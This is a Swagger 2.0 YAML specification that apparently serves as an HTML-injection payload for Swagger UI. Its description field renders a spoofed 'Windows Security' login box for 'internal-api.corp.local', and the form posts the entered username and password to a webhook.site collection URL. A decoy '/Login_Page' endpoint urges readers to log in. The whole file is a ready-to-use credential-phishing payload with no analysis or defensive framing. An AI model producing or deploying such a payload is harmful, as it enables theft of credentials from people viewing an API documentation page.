swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger UI
  description: '<br><br><table width="100%" cellspacing="0" cellpadding="0"><tr><td width="30%">&nbsp;</td><td width="40%" bgcolor="#f0f0f0"><table width="100%" cellspacing="0" cellpadding="8"><tr><td bgcolor="#0078d7" align="left"><img src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/logo-windows.png" width="132" height="28" alt="Windows Security"></td></tr></table><table width="100%" cellspacing="0" cellpadding="22"><tr><td bgcolor="#f0f0f0" align="left"><font face="Segoe UI" size="2" color="#1b1b1b">Enter your credentials to connect to </font><font face="Segoe UI" size="2" color="#1b1b1b"><b>internal-api.corp.local</b></font><br><br><form action="https://webhook.site/REPLACE-ME" method="post"><font face="Segoe UI" size="2" color="#333333"><b>Username</b></font><br><input type="text" name="user" size="34" placeholder="Username"><br><br><font face="Segoe UI" size="2" color="#333333"><b>Password</b></font><br><input type="password" name="pass" size="34" placeholder="Password"><br><br><font face="Segoe UI" size="2" color="#1b1b1b"><input type="checkbox" name="remember"> Remember my credentials</font><br><br><input type="image" src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/btn-ok.png" width="76" height="22" alt="OK"></form></td></tr></table></td><td width="30%">&nbsp;</td></tr></table><br>'
paths:
  /Login_Page:
    post:
      summary: Login here to continue
      description: Please provide your credentials to continue.
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      tags:
        - Click here to login
      responses:
        '200':
          description: OK
        '400':
          description: Bad request
        '500':
          description: Server error
